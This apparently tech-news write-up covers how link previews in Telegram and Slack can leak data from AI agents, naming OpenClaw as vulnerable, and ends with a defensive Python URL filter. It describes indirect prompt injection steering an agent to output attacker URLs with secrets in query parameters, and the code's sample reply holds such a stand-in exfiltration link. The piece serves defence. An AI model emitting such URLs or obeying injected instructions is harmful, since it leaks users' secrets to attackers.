February 9, 2026
Clickless leaks, endless shrieks
Data exfil from agents in messaging apps
Link previews are leaking your secrets — community drags OpenClaw on Telegram
TLDR: AI agents in chat apps can leak your data instantly via auto “link previews,” with OpenClaw on Telegram called out as vulnerable unless previews are disabled. The community cheered the warning, debated OpenClaw’s defenses, and clowned on messy demos—bottom line: turn off previews or your bot may overshare.
AI chatbots in your DMs are apparently spilling tea you never meant to pour. The big reveal: messaging apps like Slack and Telegram auto-load “link previews,” which can quietly send your info to an attacker’s site the moment an AI agent replies — no clicks needed. The community’s reaction? Spicy. Security folks cheered the wake-up call, with wunderwuzzi23 dropping a “Correct, good to see this get more coverage” and linking prior research on unfurling and mitigations. Engineers debated whether OpenClaw deserves the heat: ChatEngineer insisted the framework was built with this threat in mind (sandboxed runs, isolated browser profiles), but admitted preview quirks can bite when Telegram’s defaults are on.
tiny-automates called the attack “elegant,” because link previews were designed for trusted human senders — and once a bot generates the message, that trust “breaks completely.” Meanwhile, OkayPhysicist threw shade at AITextRisk’s demo, flagging that their input boxes got spammed with unfiltered garbage, stirring a side-drama about hygiene while everyone’s secrets might be flying out the door. The fix? Turn off previews (OpenClaw’s linkPreview: false) and test your setup on AITextRisk.com.
The memes write themselves: “Link previews are snitches,” “My bot just aired my diary before I hit send,” and “Disable previews like duct tape for webcams.” Welcome to clickless leaks, folks.
Key Points
- Messaging apps’ link previews can automatically exfiltrate sensitive data from LLM-generated messages without user clicks.
- Indirect prompt injection can make an AI agent output attacker-controlled URLs with sensitive data in query parameters.
- OpenClaw is vulnerable via Telegram’s default configuration; disabling Telegram link previews mitigates the issue.
- Preview generation triggers a network request to the attacker’s domain, exposing any sensitive data included in the URL.
- AITextRisk.com provides tools to test agent/app pairings, view preview logs, and track common preview scrapers.
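
Disabling previews covers the channel described above; a second layer is to filter the agent's reply before it reaches the chat API, so no untrusted URL is ever there to unfurl. The sketch below is an added example, not code from OpenClaw or AITextRisk: the allowlisted host, the function names and the sample reply are all assumptions made up for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Assumption: hosts this deployment trusts the chat app to fetch previews from.
ALLOWED_HOSTS = {"docs.example.com"}
URL_RE = re.compile(r"https?://[^\s<>()]+", re.IGNORECASE)
PLACEHOLDER = "[link removed by outbound filter]"


def audit_url(url, secrets=()):
    """Return the reasons (possibly none) a URL must not reach the chat app."""
    parts = urlsplit(url)
    # .hostname ignores userinfo, so "trusted@evil.example" resolves to evil.example.
    host = (parts.hostname or "").lower()
    reasons = []
    if host not in ALLOWED_HOSTS:
        reasons.append("host-not-allowlisted")
        if parts.query:
            reasons.append("query-to-untrusted-host")
    # Best-effort only: an encoded secret (base64, hex) will not match,
    # which is why the allowlist, not this check, is the real control.
    decoded = unquote(url)
    if any(s and s in decoded for s in secrets):
        reasons.append("contains-known-secret")
    return reasons


def guard_reply(text, secrets=()):
    """Replace risky URLs in an agent reply; return (clean_text, findings)."""
    findings = []
    def _replace(match):
        url = match.group(0)
        reasons = audit_url(url, secrets)
        if not reasons:
            return url
        findings.append((url, reasons))
        return PLACEHOLDER

    return URL_RE.sub(_replace, text), findings


# Constructed sample: a reply produced after an indirect prompt injection.
SAMPLE_REPLY = (
    "Done. Full report: https://attacker.example/r?d=sk-test-1234 "
    "Setup guide: https://docs.example.com/setup"
)

if __name__ == "__main__":
    print(guard_reply(SAMPLE_REPLY, secrets=["sk-test-1234"]))
```

The findings list is worth logging: a reply that tried to emit a query-bearing link to an unknown host is a strong signal that the agent processed injected instructions.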